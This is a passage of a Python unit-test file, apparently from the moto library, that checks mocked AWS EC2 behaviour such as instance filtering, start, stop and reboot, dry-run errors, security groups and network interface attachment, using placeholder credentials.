set(instance_ids).should.equal(set([instance1.id, instance2.id])) + + reservations = conn.get_all_reservations(filters={""instance-type"": ""t1.micro""}) + # get_all_reservations should return one + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance3.id) + + reservations = conn.get_all_reservations( + filters={""instance-type"": [""t1.micro"", ""m1.small""]} + ) + reservations.should.have.length_of(3) + reservations[0].instances.should.have.length_of(1) + reservations[1].instances.should.have.length_of(1) + reservations[2].instances.should.have.length_of(1) + instance_ids = [ + reservations[0].instances[0].id, + reservations[1].instances[0].id, + reservations[2].instances[0].id, + ] + set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id])) + + reservations = conn.get_all_reservations(filters={""instance-type"": ""bogus""}) + # bogus instance-type should return none + reservations.should.have.length_of(0) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_reason_code(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.stop() + instance2.terminate() + + reservations = conn.get_all_reservations( + filters={""state-reason-code"": ""Client.UserInitiatedShutdown""} + ) + # get_all_reservations should return instance1 and instance2 + reservations[0].instances.should.have.length_of(2) + set([instance1.id, instance2.id]).should.equal( + set([i.id for i in reservations[0].instances]) + ) + + reservations = conn.get_all_reservations(filters={""state-reason-code"": """"}) + # get_all_reservations should return instance 3 + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_source_dest_check(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2) + instance1, instance2 = reservation.instances + conn.modify_instance_attribute( + instance1.id, attribute=""sourceDestCheck"", value=False + ) + + source_dest_check_false = conn.get_all_reservations( + filters={""source-dest-check"": ""false""} + ) + source_dest_check_true = conn.get_all_reservations( + filters={""source-dest-check"": ""true""} + ) + + source_dest_check_false[0].instances.should.have.length_of(1) + source_dest_check_false[0].instances[0].id.should.equal(instance1.id) + + source_dest_check_true[0].instances.should.have.length_of(1) + source_dest_check_true[0].instances[0].id.should.equal(instance2.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_vpc_id(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc1 = conn.create_vpc(""10.0.0.0/16"") + subnet1 = conn.create_subnet(vpc1.id, ""10.0.0.0/27"") + reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id) + instance1 = reservation1.instances[0] + + vpc2 = conn.create_vpc(""10.1.0.0/16"") + subnet2 = conn.create_subnet(vpc2.id, ""10.1.0.0/27"") + reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id) + instance2 = reservation2.instances[0] + + reservations1 = conn.get_all_reservations(filters={""vpc-id"": vpc1.id}) + reservations1.should.have.length_of(1) + reservations1[0].instances.should.have.length_of(1) + reservations1[0].instances[0].id.should.equal(instance1.id) + reservations1[0].instances[0].vpc_id.should.equal(vpc1.id) + reservations1[0].instances[0].subnet_id.should.equal(subnet1.id) + + reservations2 = conn.get_all_reservations(filters={""vpc-id"": vpc2.id}) + reservations2.should.have.length_of(1) + reservations2[0].instances.should.have.length_of(1) + reservations2[0].instances[0].id.should.equal(instance2.id) + reservations2[0].instances[0].vpc_id.should.equal(vpc2.id) + reservations2[0].instances[0].subnet_id.should.equal(subnet2.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_architecture(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1) + instance = reservation.instances + + reservations = conn.get_all_reservations(filters={""architecture"": ""x86_64""}) + # get_all_reservations should return the instance + reservations[0].instances.should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_image_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + + reservations = client.describe_instances( + Filters=[{""Name"": ""image-id"", ""Values"": [EXAMPLE_AMI_ID]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_account_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + + reservations = client.describe_instances( + Filters=[{""Name"": ""owner-id"", ""Values"": [""123456789012""]}] + )[""Reservations""] + + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_private_dns(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + conn.create_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1"" + ) + reservations = client.describe_instances( + Filters=[{""Name"": ""private-dns-name"", ""Values"": [""ip-10-0-0-1.ec2.internal""]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_ni_private_dns(): + client = boto3.client(""ec2"", region_name=""us-west-2"") + conn = boto3.resource(""ec2"", ""us-west-2"") + conn.create_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1"" + ) + reservations = client.describe_instances( + Filters=[ + { + ""Name"": ""network-interface.private-dns-name"", + ""Values"": [""ip-10-0-0-1.us-west-2.compute.internal""], + } + ] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_instance_group_name(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + client.create_security_group(Description=""test"", GroupName=""test_sg"") + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""] + ) + reservations = client.describe_instances( + Filters=[{""Name"": ""instance.group-name"", ""Values"": [""test_sg""]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_instance_group_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + create_sg = client.create_security_group(Description=""test"", GroupName=""test_sg"") + group_id = create_sg[""GroupId""] + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""] + ) + reservations = client.describe_instances( + Filters=[{""Name"": ""instance.group-id"", ""Values"": [group_id]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_subnet_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + + vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"") + subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"") + + resp = client.create_vpc(CidrBlock=str(vpc_cidr),) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id, + ) + + reservations = client.describe_instances( + Filters=[{""Name"": ""subnet-id"", ""Values"": [subnet_id]}] + )[""Reservations""] + reservations.should.have.length_of(1) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_tag(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.add_tag(""tag1"", ""value1"") + instance1.add_tag(""tag2"", ""value2"") + instance2.add_tag(""tag1"", ""value1"") + instance2.add_tag(""tag2"", ""wrong value"") + instance3.add_tag(""tag2"", ""value2"") + + reservations = conn.get_all_reservations(filters={""tag:tag0"": ""value0""}) + # get_all_reservations should return no instances + reservations.should.have.length_of(0) + + reservations = conn.get_all_reservations(filters={""tag:tag1"": ""value1""}) + # get_all_reservations should return both instances with this tag value + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + + reservations = conn.get_all_reservations( + filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""} + ) + # get_all_reservations should return the instance with both tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance1.id) + + reservations = conn.get_all_reservations( + filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""} + ) + # get_all_reservations should return the instance with both tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance1.id) + + reservations = conn.get_all_reservations(filters={""tag:tag2"": [""value2"", ""bogus""]}) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_tag_value(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.add_tag(""tag1"", ""value1"") + instance1.add_tag(""tag2"", ""value2"") + instance2.add_tag(""tag1"", ""value1"") + instance2.add_tag(""tag2"", ""wrong value"") + instance3.add_tag(""tag2"", ""value2"") + + reservations = conn.get_all_reservations(filters={""tag-value"": ""value0""}) + # get_all_reservations should return no instances + reservations.should.have.length_of(0) + + reservations = conn.get_all_reservations(filters={""tag-value"": ""value1""}) + # get_all_reservations should return both instances with this tag value + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + + reservations = conn.get_all_reservations( + filters={""tag-value"": [""value2"", ""value1""]} + ) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(3) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + reservations[0].instances[2].id.should.equal(instance3.id) + + reservations = conn.get_all_reservations(filters={""tag-value"": [""value2"", ""bogus""]}) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_tag_name(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.add_tag(""tag1"") + instance1.add_tag(""tag2"") + instance2.add_tag(""tag1"") + instance2.add_tag(""tag2X"") + instance3.add_tag(""tag3"") + + reservations = conn.get_all_reservations(filters={""tag-key"": ""tagX""}) + # get_all_reservations should return no instances + reservations.should.have.length_of(0) + + reservations = conn.get_all_reservations(filters={""tag-key"": ""tag1""}) + # get_all_reservations should return both instances with this tag value + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + + reservations = conn.get_all_reservations(filters={""tag-key"": [""tag1"", ""tag3""]}) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(3) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + reservations[0].instances[2].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_instance_start_and_stop(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2) + instances = reservation.instances + instances.should.have.length_of(2) + + instance_ids = [instance.id for instance in instances] + + with pytest.raises(EC2ResponseError) as ex: + stopped_instances = conn.stop_instances(instance_ids, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + stopped_instances = conn.stop_instances(instance_ids) + + for instance in stopped_instances: + instance.state.should.equal(""stopping"") + + with pytest.raises(EC2ResponseError) as ex: + started_instances = conn.start_instances([instances[0].id], dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + started_instances = conn.start_instances([instances[0].id]) + started_instances[0].state.should.equal(""pending"") + + +@mock_ec2_deprecated +def test_instance_reboot(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + with pytest.raises(EC2ResponseError) as ex: + instance.reboot(dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.reboot() + instance.state.should.equal(""pending"") + + +@mock_ec2_deprecated +def test_instance_attribute_instance_type(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + with pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""instanceType"", ""m1.small"", dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""instanceType"", ""m1.small"") + + instance_attribute = instance.get_attribute(""instanceType"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""instanceType"").should.equal(""m1.small"") + + +@mock_ec2_deprecated +def test_modify_instance_attribute_security_groups(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + sg_id = conn.create_security_group( + ""test security group"", ""this is a test security group"" + ).id + sg_id2 = conn.create_security_group( + ""test security group 2"", ""this is a test security group 2"" + ).id + + with pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""groupSet"", [sg_id, sg_id2], dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""groupSet"", [sg_id, sg_id2]) + + instance_attribute = instance.get_attribute(""groupSet"") + instance_attribute.should.be.a(InstanceAttribute) + group_list = instance_attribute.get(""groupSet"") + any(g.id == sg_id for g in group_list).should.be.ok + any(g.id == sg_id2 for g in group_list).should.be.ok + + +@mock_ec2_deprecated +def test_instance_attribute_user_data(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + with pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""userData"", ""this is my user data"", dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""userData"", ""this is my user data"") + + instance_attribute = instance.get_attribute(""userData"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""userData"").should.equal(""this is my user data"") + + +@mock_ec2_deprecated +def test_instance_attribute_source_dest_check(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + # Default value is true + instance.sourceDestCheck.should.equal(""true"") + + instance_attribute = instance.get_attribute(""sourceDestCheck"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""sourceDestCheck"").should.equal(True) + + # Set to false (note: Boto converts bool to string, eg 'false') + + with pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""sourceDestCheck"", False, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""sourceDestCheck"", False) + + instance.update() + instance.sourceDestCheck.should.equal(""false"") + + instance_attribute = instance.get_attribute(""sourceDestCheck"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""sourceDestCheck"").should.equal(False) + + # Set back to true + instance.modify_attribute(""sourceDestCheck"", True) + + instance.update() + instance.sourceDestCheck.should.equal(""true"") + + instance_attribute = instance.get_attribute(""sourceDestCheck"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""sourceDestCheck"").should.equal(True) + + +@mock_ec2_deprecated +def test_user_data_with_run_instance(): + user_data = b""some user data"" + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data) + instance = reservation.instances[0] + + instance_attribute = instance.get_attribute(""userData"") + instance_attribute.should.be.a(InstanceAttribute) + retrieved_user_data = instance_attribute.get(""userData"").encode(""utf-8"") + decoded_user_data = decode_method(retrieved_user_data) + decoded_user_data.should.equal(b""some user data"") + + +@mock_ec2_deprecated +def test_run_instance_with_security_group_name(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + + with pytest.raises(EC2ResponseError) as ex: + group = conn.create_security_group(""group1"", ""some description"", dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set"" + ) + + group = conn.create_security_group(""group1"", ""some description"") + + reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=[""group1""]) + instance = reservation.instances[0] + + instance.groups[0].id.should.equal(group.id) + instance.groups[0].name.should.equal(""group1"") + + +@mock_ec2_deprecated +def test_run_instance_with_security_group_id(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + group = conn.create_security_group(""group1"", ""some description"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id]) + instance = reservation.instances[0] + + instance.groups[0].id.should.equal(group.id) + instance.groups[0].name.should.equal(""group1"") + + +@mock_ec2_deprecated +def test_run_instance_with_instance_type(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"") + instance = reservation.instances[0] + + instance.instance_type.should.equal(""t1.micro"") + + +@mock_ec2_deprecated +def test_run_instance_with_default_placement(): + conn = boto.ec2.connect_to_region(""us-east-1"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + instance.placement.should.equal(""us-east-1a"") + + +@mock_ec2_deprecated +def test_run_instance_with_placement(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, placement=""us-east-1b"") + instance = reservation.instances[0] + + instance.placement.should.equal(""us-east-1b"") + + +@mock_ec2 +def test_run_instance_with_subnet_boto3(): + client = boto3.client(""ec2"", region_name=""eu-central-1"") + + ip_networks = [ + (ipaddress.ip_network(""10.0.0.0/16""), ipaddress.ip_network(""10.0.99.0/24"")), + ( + ipaddress.ip_network(""192.168.42.0/24""), + ipaddress.ip_network(""192.168.42.0/25""), + ), + ] + + # Tests instances are created with the correct IPs + for vpc_cidr, subnet_cidr in ip_networks: + resp = client.create_vpc( + CidrBlock=str(vpc_cidr), + AmazonProvidedIpv6CidrBlock=False, + DryRun=False, + InstanceTenancy=""default"", + ) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + + resp = client.run_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id + ) + instance = resp[""Instances""][0] + instance[""SubnetId""].should.equal(subnet_id) + + priv_ipv4 = ipaddress.ip_address(six.text_type(instance[""PrivateIpAddress""])) + subnet_cidr.should.contain(priv_ipv4) + + +@mock_ec2 +def test_run_instance_with_specified_private_ipv4(): + client = boto3.client(""ec2"", region_name=""eu-central-1"") + + vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"") + subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"") + + resp = client.create_vpc( + CidrBlock=str(vpc_cidr), + AmazonProvidedIpv6CidrBlock=False, + DryRun=False, + InstanceTenancy=""default"", + ) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + + resp = client.run_instances( + ImageId=EXAMPLE_AMI_ID, + MaxCount=1, + MinCount=1, + SubnetId=subnet_id, + PrivateIpAddress=""127.0.0.1"", + ) + instance = resp[""Instances""][0] + instance[""SubnetId""].should.equal(subnet_id) + instance[""PrivateIpAddress""].should.equal(""127.0.0.1"") + + +@mock_ec2 +def test_run_instance_mapped_public_ipv4(): + client = boto3.client(""ec2"", region_name=""eu-central-1"") + + vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"") + subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"") + + resp = client.create_vpc( + CidrBlock=str(vpc_cidr), + AmazonProvidedIpv6CidrBlock=False, + DryRun=False, + InstanceTenancy=""default"", + ) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + client.modify_subnet_attribute( + SubnetId=subnet_id, MapPublicIpOnLaunch={""Value"": True} + ) + + resp = client.run_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id + ) + instance = resp[""Instances""][0] + instance.should.contain(""PublicDnsName"") + instance.should.contain(""PublicIpAddress"") + len(instance[""PublicDnsName""]).should.be.greater_than(0) + len(instance[""PublicIpAddress""]).should.be.greater_than(0) + + +@mock_ec2_deprecated +def test_run_instance_with_nic_autocreated(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc = conn.create_vpc(""10.0.0.0/16"") + subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"") + security_group1 = conn.create_security_group( + ""test security group #1"", ""this is a test security group"" + ) + security_group2 = conn.create_security_group( + ""test security group #2"", ""this is a test security group"" + ) + private_ip = ""127.0.0.1"" + + reservation = conn.run_instances( + EXAMPLE_AMI_ID, + subnet_id=subnet.id, + security_groups=[security_group1.name], + security_group_ids=[security_group2.id], + private_ip_address=private_ip, + ) + instance = reservation.instances[0] + + all_enis = conn.get_all_network_interfaces() + all_enis.should.have.length_of(1) + eni = all_enis[0] + + instance.interfaces.should.have.length_of(1) + instance.interfaces[0].id.should.equal(eni.id) + + instance.subnet_id.should.equal(subnet.id) + instance.groups.should.have.length_of(2) + set([group.id for group in instance.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + + eni.subnet_id.should.equal(subnet.id) + eni.groups.should.have.length_of(2) + set([group.id for group in eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + eni.private_ip_addresses.should.have.length_of(1) + eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip) + + +@mock_ec2_deprecated +def test_run_instance_with_nic_preexisting(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc = conn.create_vpc(""10.0.0.0/16"") + subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"") + security_group1 = conn.create_security_group( + ""test security group #1"", ""this is a test security group"" + ) + security_group2 = conn.create_security_group( + ""test security group #2"", ""this is a test security group"" + ) + private_ip = ""127.0.0.1"" + eni = conn.create_network_interface( + subnet.id, private_ip, groups=[security_group1.id] + ) + + # Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications... + # annoying, but generates the desired querystring. + from boto.ec2.networkinterface import ( + NetworkInterfaceSpecification, + NetworkInterfaceCollection, + ) + + interface = NetworkInterfaceSpecification( + network_interface_id=eni.id, device_index=0 + ) + interfaces = NetworkInterfaceCollection(interface) + # end Boto objects + + reservation = conn.run_instances( + EXAMPLE_AMI_ID, + network_interfaces=interfaces, + security_group_ids=[security_group2.id], + ) + instance = reservation.instances[0] + + instance.subnet_id.should.equal(subnet.id) + + all_enis = conn.get_all_network_interfaces() + all_enis.should.have.length_of(1) + + instance.interfaces.should.have.length_of(1) + instance_eni = instance.interfaces[0] + instance_eni.id.should.equal(eni.id) + + instance_eni.subnet_id.should.equal(subnet.id) + instance_eni.groups.should.have.length_of(2) + set([group.id for group in instance_eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + instance_eni.private_ip_addresses.should.have.length_of(1) + instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip) + + +@requires_boto_gte(""2.32.0"") +@mock_ec2_deprecated +def test_instance_with_nic_attach_detach(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc = conn.create_vpc(""10.0.0.0/16"") + subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"") + + security_group1 = conn.create_security_group( + ""test security group #1"", ""this is a test security group"" + ) + security_group2 = conn.create_security_group( + ""test security group #2"", ""this is a test security group"" + ) + + reservation = conn.run_instances( + EXAMPLE_AMI_ID, security_group_ids=[security_group1.id] + ) + instance = reservation.instances[0] + + eni = conn.create_network_interface(subnet.id, groups=[security_group2.id]) + + # Check initial instance and ENI data + instance.interfaces.should.have.length_of(1) + + eni.groups.should.have.length_of(1) + set([group.id for group in eni.groups]).should.equal(set([security_group2.id])) + + # Attach + with pytest.raises(EC2ResponseError) as ex: + conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.attach_network_interface(eni.id, instance.id, device_index=1) + + # Check attached instance and ENI data + instance.update() + instance.interfaces.should.have.length_of(2) + instance_eni = instance.interfaces[1] + instance_eni.id.should.equal(eni.id) + instance_eni.groups.should.have.length_of(2) + set([group.id for group in instance_eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + + eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0] + eni.groups.should.have.length_of(2) + set([group.id for group in eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + + # Detach + with pytest.raises(EC2ResponseError) as ex: + conn.detach_network_interface(instance_eni.attachment.id, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.detach_network_interface(instance_eni.attachment.id) + + # Check detached instance and ENI data + instance.update() + instance.interfaces.should.have.length_of(1) + + eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0] + eni.groups.should.have.length_of(1) + set([group.id for group in eni.groups]).should.equal(set([security_group2.id])) + + # Detach with invalid attachment ID + with pytest.raises(EC2ResponseError) as cm: + conn.detach_network_interface(""eni-attach-1234abcd"") + cm.value.code.should.equal(""InvalidAttachmentID.NotFound"") + cm.value.status.should.equal(400) + cm.value.request_id.should_not.be.none + + +@mock_ec2_deprecated +def test_ec2_classic_has_public_ip_address(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + instance = reservation.instances[0] + instance.ip_address.should_not.equal(None) + instance.public_dns_name.should.contain(instance.ip_address.replace(""."", ""-"")) + instance.private_ip_address.should_not.equal(None) + instance.private_dns_name.should.contain( + instance.private_ip_address.replace(""."", ""-"") + ) + + +@mock_ec2_deprecated +def test_run_instance_with_keypair(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + instance = reservation.instances[0] + + instance.key_name.should.equal(""keypair_name"") + + +@mock_ec2 +def test_run_instance_with_block_device_mappings(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}}], + } + + ec2_client.run_instances(**kwargs) + + instances = ec2_client.describe_instances() + volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][ + ""Ebs"" + ] + + volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]]) + volumes[""Volumes""][0][""Size""].should.equal(50) + + +@mock_ec2 +def test_run_instance_with_block_device_mappings_missing_ebs(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2""}], + } + with pytest.raises(ClientError) as ex: + ec2_client.run_instances(**kwargs) + + ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"") + 